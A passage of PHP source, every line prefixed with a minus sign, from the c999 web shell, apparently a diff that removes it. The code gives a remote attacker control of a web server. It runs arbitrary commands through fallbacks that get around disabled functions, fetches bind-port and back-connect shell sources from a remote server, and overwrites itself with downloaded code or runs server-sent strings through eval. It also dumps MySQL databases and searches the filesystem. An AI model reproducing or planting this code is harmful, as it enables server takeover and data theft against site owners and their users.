- if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
- else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}}
- if (!$ret) {return $ret;}
- }
- }
- closedir($h);
- return TRUE;
- }
- }
- if (!function_exists("fs_move_obj"))
- {
- function fs_move_obj($d,$t)
- {
- $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
- $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
- if (is_dir($d))
- {
- if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
- if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
- return fs_move_dir($d,$t);
- }
- elseif (is_file($d))
- {
- if(copy($d,$t)) {return unlink($d);}
- else {unlink($t); return FALSE;}
- }
- else {return FALSE;}
- }
- }
- if (!function_exists("fs_rmdir"))
- {
- function fs_rmdir($d)
- {
- $h = opendir($d);
- while (($o = readdir($h)) !== FALSE)
- {
- if (($o != ".") and ($o != ".."))
- {
- if (!is_dir($d.$o)) {unlink($d.$o);}
- else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
- }
- }
- closedir($h);
- rmdir($d);
- return !is_dir($d);
- }
- }
- if (!function_exists("fs_rmobj"))
- {
- function fs_rmobj($o)
- {
- $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);
- if (is_dir($o))
- {
- if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
- return fs_rmdir($o);
- }
- elseif (is_file($o)) {return unlink($o);}
- else {return FALSE;}
- }
- }
- if (!function_exists("myshellexec"))
- {
- function myshellexec($cmd)
- {
- global $disablefunc;
- $result = "";
- if (!empty($cmd))
- {
- if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
- elseif (($result = `$cmd`) !== FALSE) {}
- elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
- elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
- elseif (is_resource($fp = popen($cmd,"r")))
- {
- $result = "";
- while(!feof($fp)) {$result .= fread($fp,1024);}
- pclose($fp);
- }
- }
- return $result;
- }
- }
- if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}}
- if (!function_exists("view_perms"))
- {
- function view_perms($mode)
- {
- if (($mode & 0xC000) === 0xC000) {$type = "s";}
- elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
- elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
- elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
- elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
- elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
- elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
- else {$type = "?";}
- $owner["read"] = ($mode & 00400)?"r":"-";
- $owner["write"] = ($mode & 00200)?"w":"-";
- $owner["execute"] = ($mode & 00100)?"x":"-";
- $group["read"] = ($mode & 00040)?"r":"-";
- $group["write"] = ($mode & 00020)?"w":"-";
- $group["execute"] = ($mode & 00010)?"x":"-";
- $world["read"] = ($mode & 00004)?"r":"-";
- $world["write"] = ($mode & 00002)? "w":"-";
- $world["execute"] = ($mode & 00001)?"x":"-";
- if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
- if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
- if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
- return $type.join("",$owner).join("",$group).join("",$world);
- }
- }
- if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}}
- if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}}
- if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}}
- if (!function_exists("parse_perms"))
- {
- function parse_perms($mode)
- {
- if (($mode & 0xC000) === 0xC000) {$t = "s";}
- elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
- elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
- elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
- elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
- elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
- elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
- else {$t = "?";}
- $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
- $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
- $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
- return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
- }
- }
- if (!function_exists("parsesort"))
- {
- function parsesort($sort)
- {
- $one = intval($sort);
- $second = substr($sort,-1);
- if ($second != "d") {$second = "a";}
- return array($one,$second);
- }
- }
- if (!function_exists("view_perms_color"))
- {
- function view_perms_color($o)
- {
- if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";}
- elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";}
- else {return "<font color=green>".view_perms(fileperms($o))."</font>";}
- }
- }
- if (!function_exists("c999getsource"))
- {
- function c999getsource($fn)
- {
- global $c999sh_sourcesurl;
- $array = array(
- "c999sh_bindport.pl" => "c999sh_bindport_pl.txt",
- "c999sh_bindport.c" => "c999sh_bindport_c.txt",
- "c999sh_backconn.pl" => "c999sh_backconn_pl.txt",
- "c999sh_backconn.c" => "c999sh_backconn_c.txt",
- "c999sh_datapipe.pl" => "c999sh_datapipe_pl.txt",
- "c999sh_datapipe.c" => "c999sh_datapipe_c.txt",
- );
- $name = $array[$fn];
- if ($name) {return file_get_contents($c999sh_sourcesurl.$name);}
- else {return FALSE;}
- }
- }
- if (!function_exists("c999sh_getupdate"))
- {
- function c999sh_getupdate($update = TRUE)
- {
- $url = $GLOBALS["c999sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&";
- $data = @file_get_contents($url);
- if (!$data) {return "Can't connect to update-server!";}
- else
- {
- $data = ltrim($data);
- $string = substr($data,3,ord($data{2}));
- if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return FALSE;}
- if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";}
- if ($data{0} == "\x99" and $data{1} == "\x03")
- {
- $string = explode("\x01",$string);
- if ($update)
- {
- $confvars = array();
- $sourceurl = $string[0];
- $source = file_get_contents($sourceurl);
- if (!$source) {return "Can't fetch update!";}
- else
- {
- $fp = fopen(__FILE__,"w");
- if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download c999shell.php manually <a href=\"".$sourceurl."\"><u>here</u></a>.";}
- else {fwrite($fp,$source); fclose($fp); return "Thanks! Updated with success.";}
- }
- }
- else {return "New version are available: ".$string[1];}
- }
- elseif ($data{0} == "\x99" and $data{1} == "\x04") {eval($string); return 1;}
- else {return "Error in protocol: segmentation failed! (".$data.") ";}
- }
- }
- }
- if (!function_exists("mysql_dump"))
- {
- function mysql_dump($set)
- {
- global $shver;
- $sock = $set["sock"];
- $db = $set["db"];
- $print = $set["print"];
- $nl2br = $set["nl2br"];
- $file = $set["file"];
- $add_drop = $set["add_drop"];
- $tabs = $set["tabs"];
- $onlytabs = $set["onlytabs"];
- $ret = array();
- $ret["err"] = array();
- if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
- if (empty($db)) {$db = "db";}
- if (empty($print)) {$print = 0;}
- if (empty($nl2br)) {$nl2br = 0;}
- if (empty($add_drop)) {$add_drop = TRUE;}
- if (empty($file))
- {
- $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
- }
- if (!is_array($tabs)) {$tabs = array();}
- if (empty($add_drop)) {$add_drop = TRUE;}
- if (sizeof($tabs) == 0)
- {
- // retrive tables-list
- $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
- if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
- }
- $out = "# Dumped by c999Shell.SQL v. ".$shver."
- #
- # Host settings:
- # MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
- # Date: ".date("d.m.Y H:i:s")."
- # DB: \"".$db."\"
- #---------------------------------------------------------
- ";
- $c = count($onlytabs);
- foreach($tabs as $tab)
- {
- if ((in_array($tab,$onlytabs)) or (!$c))
- {
- if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
- // recieve query for create table structure
- $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
- if (!$res) {$ret["err"][] = mysql_smarterror();}
- else
- {
- $row = mysql_fetch_row($res);
- $out .= $row["1"].";\n\n";
- // recieve table variables
- $res = mysql_query("SELECT * FROM `$tab`", $sock);
- if (mysql_num_rows($res) > 0)
- {
- while ($row = mysql_fetch_assoc($res))
- {
- $keys = implode("`, `", array_keys($row));
- $values = array_values($row);
- foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
- $values = implode("', '", $values);
- $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
- $out .= $sql;
- }
- }
- }
- }
- }
- $out .= "#---------------------------------------------------------------------------------\n\n";
- if ($file)
- {
- $fp = fopen($file, "w");
- if (!$fp) {$ret["err"][] = 2;}
- else
- {
- fwrite ($fp, $out);
- fclose ($fp);
- }
- }
- if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
- return $out;
- }
- }
- if (!function_exists("mysql_buildwhere"))
- {
- function mysql_buildwhere($array,$sep=" and",$functs=array())
- {
- if (!is_array($array)) {$array = array();}
- $result = "";
- foreach($array as $k=>$v)
- {
- $value = "";
- if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
- $value .= "'".addslashes($v)."'";
- if (!empty($functs[$k])) {$value .= ")";}
- $result .= "`".$k."` = ".$value.$sep;
- }
- $result = substr($result,0,strlen($result)-strlen($sep));
- return $result;
- }
- }
- if (!function_exists("mysql_fetch_all"))
- {
- function mysql_fetch_all($query,$sock)
- {
- if ($sock) {$result = mysql_query($query,$sock);}
- else {$result = mysql_query($query);}
- $array = array();
- while ($row = mysql_fetch_array($result)) {$array[] = $row;}
- mysql_free_result($result);
- return $array;
- }
- }
- if (!function_exists("mysql_smarterror"))
- {
- function mysql_smarterror($type,$sock)
- {
- if ($sock) {$error = mysql_error($sock);}
- else {$error = mysql_error();}
- $error = htmlspecialchars($error);
- return $error;
- }
- }
- if (!function_exists("mysql_query_form"))
- {
- function mysql_query_form()
- {
- global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
- if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
- if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
- if ((!$submit) or ($sql_act))
- {
- echo "<table border=0><tr><td><form name=\"c999sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\"> <input type=submit value=\"No\"></form></td>";
- if ($tbl_struct)
- {
- echo "<td valign=\"top\"><b>Fields:</b><br>";
- foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» <a href=\"#\" onclick=\"document.c999sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
- echo "</td></tr></table>";
- }
- }
- if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
- }
- }
- if (!function_exists("mysql_create_db"))
- {
- function mysql_create_db($db,$sock="")
- {
- $sql = "CREATE DATABASE `".addslashes($db)."`;";
- if ($sock) {return mysql_query($sql,$sock);}
- else {return mysql_query($sql);}
- }
- }
- if (!function_exists("mysql_query_parse"))
- {
- function mysql_query_parse($query)
- {
- $query = trim($query);
- $arr = explode (" ",$query);
- /*array array()
- {
- "METHOD"=>array(output_type),
- "METHOD1"...
- ...
- }
- if output_type == 0, no output,
- if output_type == 1, no output if no error
- if output_type == 2, output without control-buttons
- if output_type == 3, output with control-buttons
- */
- $types = array(
- "SELECT"=>array(3,1),
- "SHOW"=>array(2,1),
- "DELETE"=>array(1),
- "DROP"=>array(1)
- );
- $result = array();
- $op = strtoupper($arr[0]);
- if (is_array($types[$op]))
- {
- $result["propertions"] = $types[$op];
- $result["query"] = $query;
- if ($types[$op] == 2)
- {
- foreach($arr as $k=>$v)
- {
- if (strtoupper($v) == "LIMIT")
- {
- $result["limit"] = $arr[$k+1];
- $result["limit"] = explode(",",$result["limit"]);
- if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
- unset($arr[$k],$arr[$k+1]);
- }
- }
- }
- }
- else {return FALSE;}
- }
- }
- if (!function_exists("c999fsearch"))
- {
- function c999fsearch($d)
- {
- global $found;
- global $found_d;
- global $found_f;
- global $search_i_f;
- global $search_i_d;
- global $a;
- if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
- $h = opendir($d);
- while (($f = readdir($h)) !== FALSE)
- {
- if($f != "." && $f != "..")
- {
- $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f));
- if (is_dir($d.$f))
- {
- $search_i_d++;
- if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
- if (!is_link($d.$f)) {c999fsearch($d.$f);}
- }
- else
- {
- $search_i_f++;
- if ($bool)
- {
- if (!empty($a["text"]))
- {
- $r = @file_get_contents($d.$f);
- if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
- if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
- if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
- else {$bool = strpos(" ".$r,$a["text"],1);}
- if ($a["text_not"]) {$bool = !$bool;}
- if ($bool) {$found[] = $d.$f; $found_f++;}
- }
- else {$found[] = $d.$f; $found_f++;}
- }
- }
- }
- }
- closedir($h);
- }
- }
- if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}}
- //Sending headers
- @ob_start();
- @ob_implicit_flush(0);
- function onphpshutdown()
- {
- global $gzipencode,$ft;
- if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad")))
- {
- $v = @ob_get_contents();
- @ob_end_clean();
- @ob_start("ob_gzHandler");
- echo $v;
- @ob_end_flush();
- }
- }
- function c999shexit()
- {
- onphpshutdown();
- exit;
- }
- header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
- header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
- header("Cache-Control: no-store, no-cache, must-revalidate");
- header("Cache-Control: post-check=0, pre-check=0", FALSE);
- header("Pragma: no-cache");
- if (empty($tmpdir))
- {
- $tmpdir = ini_get("upload_tmp_dir");
- if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}
- }
- $tmpdir = realpath($tmpdir);
- $tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);
- if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
- if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
- else {$tmpdir_logs = realpath($tmpdir_logs);}
- if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
- {
- $safemode = TRUE;
- $hsafemode = "<font color=red>ON (secure)</font>";
- }
- else {$safemode = FALSE; $hsafemode = "<font color=green>OFF (not secure)</font>";}
- $v = @ini_get("open_basedir");
- if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "<font color=red>".$v."</font>";}
- else {$openbasedir = FALSE; $hopenbasedir = "<font color=green>OFF (not secure)</font>";}
- $sort = htmlspecialchars($sort);
- if (empty($sort)) {$sort = $sort_default;}
- $sort[1] = strtolower($sort[1]);
- $DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
- if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}
- $DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE));
- @ini_set("highlight.bg",$highlight_bg); //FFFFFF
- @ini_set("highlight.comment",$highlight_comment); //#FF8000
- @ini_set("highlight.default",$highlight_default); //#0000BB
- @ini_set("highlight.html",$highlight_html); //#000000
- @ini_set("highlight.keyword",$highlight_keyword); //#007700
- @ini_set("highlight.string",$highlight_string); //#DD0000
- if (!is_array($actbox)) {$actbox = array();}
- $dspact = $act = htmlspecialchars($act);
- $disp_fullpath = $ls_arr = $notls = null;
- $ud = urlencode($d);
- ?><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title>Shell-<?php echo getenv("HTTP_HOST"); ?></title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td><p align="left"><b><?php echo $DISP_SERVER_SOFTWARE; ?></b> | <b><?php echo wordwrap(php_uname(),90,"<br>",1); ?></b> </p><p align="left"><b><?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?></b> </p><p align="left"><b>Safe-mode: <?php echo $hsafemode; ?></b></p><br><p align="left"><?php
- $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
- if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
- $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
- if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
- $d = str_replace("\\\\","\\",$d);
- $dispd = htmlspecialchars($d);
- $pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
- $i = 0;
- if (count($quicklaunch) > 0)
- {
- foreach($quicklaunch as $item)
- {
- $item[1] = str_replace("%d",urlencode($d),$item[1]);
- $item[1] = str_replace("%sort",$sort,$item[1]);
- $v = realpath($d."..");
- if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);}
- $item[1] = str_replace("%upd",urlencode($v),$item[1]);
- echo "<a href=\"".$item[1]."\">".$item[0]."</a> ";
- }
- }
- echo '<br><br>';
- foreach($pd as $b)
- {
- $t = "";
- $j = 0;
- foreach ($e as $r)
- {
- $t.= $r.DIRECTORY_SEPARATOR;
- if ($j == $i) {break;}
- $j++;
- }
- echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>";
- $i++;
- }
- echo " ";
- if (is_writable($d))
- {
- $wd = TRUE;
- $wdt = "<font color=green>[ ok ]</font>";
- echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>";
- }
- else
- {
- $wd = FALSE;
- $wdt = "<font color=red>[ Read-Only ]</font>";
- echo "<b>".view_perms_color($d)."</b>";
- }
- if (is_callable("disk_free_space"))
- {
- $free = disk_free_space($d);
- $total = disk_total_space($d);
- if ($free === FALSE) {$free = 0;}
- if ($total === FALSE) {$total = 0;}
- if ($free < 0) {$free = 0;}
- if ($total < 0) {$total = 0;}
- $used = $total-$free;
- $free_percent = round(100/($total/$free),2);
- echo " <b>Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)</b>";
- }
- echo "<br>";
- $letters = "";
- if ($win)
- {
- $v = explode("\\",$d);
- $v = $v[0];
- foreach (range("a","z") as $letter)
- {
- $bool = $isdiskette = in_array($letter,$safemode_diskettes);
- if (!$bool) {$bool = is_dir($letter.":\\");}
- if ($bool)
- {
- $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">[ ";
- if ($letter.":" != $v) {$letters .= $letter;}
- else {$letters .= "<font color=green>".$letter."</font>";}
- $letters .= " ]</a> ";
- }
- }
- if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";}
- }
- echo "</p></td></tr></table><br>";
- if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";}
- echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">";
- if ($act == "") {$act = $dspact = "ls";}
- if ($act == "sql")
- {
- $sql_surl = $surl."act=sql";
- if ($sql_login) {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
- if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
- if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
- if ($sql_port) {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
- if ($sql_db) {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
- $sql_surl .= "&";
- ?><h3>Attention! SQL-Manager is <u>NOT</u> ready module! Don't reports bugs.</h3><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php
- if ($sql_server)
- {
- $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
- $err = mysql_smarterror();
- @mysql_select_db($sql_db,$sql_sock);
- if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}
- }
- else {$sql_sock = FALSE;}
- echo "<b>SQL Manager:</b><br>";
- if (!$sql_sock)
- {
- if (!$sql_server) {echo "NO CONNECTION";}
- else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";}
- }
- else
- {
- $sqlquicklaunch = array();
- $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
- $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));
- $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
- $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
- $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
- $sqlquicklaunch[] = array("Logout",$surl."act=sql");
- echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>";
- if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}}
- echo "</center>";
- }
- echo "</td></tr><tr>";
- if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"> i </font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td> <b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b> </td><td><b>Database</b> </td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php }
- else
- {
- //Start left panel
- if (!empty($sql_db))
- {
- ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php
- $result = mysql_list_tables($sql_db);
- if (!$result) {echo mysql_smarterror();}
- else
- {
- echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
- $c = 0;
